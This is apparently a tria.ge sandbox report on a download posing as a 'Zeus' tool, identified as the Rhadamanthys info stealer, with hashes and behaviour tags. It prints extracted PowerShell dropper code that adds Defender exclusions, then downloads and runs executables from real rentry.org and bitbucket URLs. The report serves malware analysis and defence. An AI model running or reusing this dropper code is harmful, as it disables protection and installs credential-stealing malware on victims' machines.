Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

07/06/2024, 15:13 UTC

240607-slps8aac5v 10

07/06/2024, 15:11 UTC

240607-sk3zfsbb99 10

07/06/2024, 15:08 UTC

240607-sh7vmaac2s 10

07/06/2024, 15:05 UTC

240607-sgnqcsbb65 10

General

  • Target

    Nicht bestätigt 879324.crdownload

  • Size

    1.4MB

  • Sample

    240607-slps8aac5v

  • MD5

    e3970ffa96653f138e63ad0148970dac

  • SHA1

    b466278571bc1b20f2cf767b2222c17449ee1dbc

  • SHA256

    5a32b1864bcb2d237aca956c3b7474c2de484c38cbaa608ab5ffc71214bae2b8

  • SHA512

    af9e28a39cda24521ad4239d8c616bffbb63a44ae3efedbf9320f83146b5ada758fc2d76fdba07e89bf9066088fd7159650b66c998549c49fbdade1022c0a163

  • SSDEEP

    24576:CvJwL1rOBrsdTKf8oyVJHOohsXiV61rbXWcbd7JFV9MGiwS5OlliRw+gj8jbpRtQ:yJwxrOBaTKf8NVtOPXdbNHFVKc/izgjz

Malware Config

Extracted

Language
ps1
Source
1
<#bji#> Add-MpPreference <#gap#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zkd#> -Force <#hep#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#nmy#> (Join-Path <#cpg#> -Path $env:AppData <#jig#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#bwf#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#nzz#> (Join-Path -Path $env:AppData <#qua#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#idz#>
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar", "C:\\Users\\Admin\\AppData\\Local\\Temp\\downloaded_archive.rar")
2
URLs
exe.dropper

https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar

Targets

    • Target

      Zeus 4.7.2.exe

    • Size

      173KB

    • MD5

      28e0ba051ad84949cfedd2a58b1636cb

    • SHA1

      6ff46613adb7594c6abbe0ee9c64a68129501fb8

    • SHA256

      265013eb61e407130b8fe723809549000ffe4ad96ef6c5ad1945e2727cee5aa0

    • SHA512

      a14ea1a7e8756e15aee996c848006a1f2212acd753ca1629224b362fe8ef24331c49617f59bd84846b95a2143744418bbd78a4d0088efab76228344662ae67a4

    • SSDEEP

      3072:NPBBih6XScZZmmiyQrcR6qx6LAIxkN3wlCxvxrtJRscwX7zhhxXNrykAOkvpObQ:Nyh6XffliyQrC6LAIxkpwlOJrtJRscwi

    • Rhadamanthys

      Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Creates new service(s)

    • Drops file in Drivers directory

    • Stops running service(s)

    • Executes dropped EXE

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      ZeusHex-GUI.dll

    • Size

      1.3MB

    • MD5

      ad714ee48d2e829c5012c65de6166c05

    • SHA1

      5880bac89ca346dae62c053aa49c028372388edd

    • SHA256

      7d32d13d123871650794a1e172adc70bc8dafbdb762f49d889f813844d532b20

    • SHA512

      a51252950455dbfb5dfd564689e605b022bdf26f80ad12f3fde3e341a14b8f764324ff3be6f29e4855bd499141e23628e9aabb0e439627dc802814db091d54ee

    • SSDEEP

      24576:ZfaPwrgBrO1BKH8jPcWYVxHCoh0XeV61r9qZWe7d7NWS91GsVz9cebgS9aI:ZCPwrgBWBKH8jkDVFCNXODzWS9HfX0HI

    Score
    1/10

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.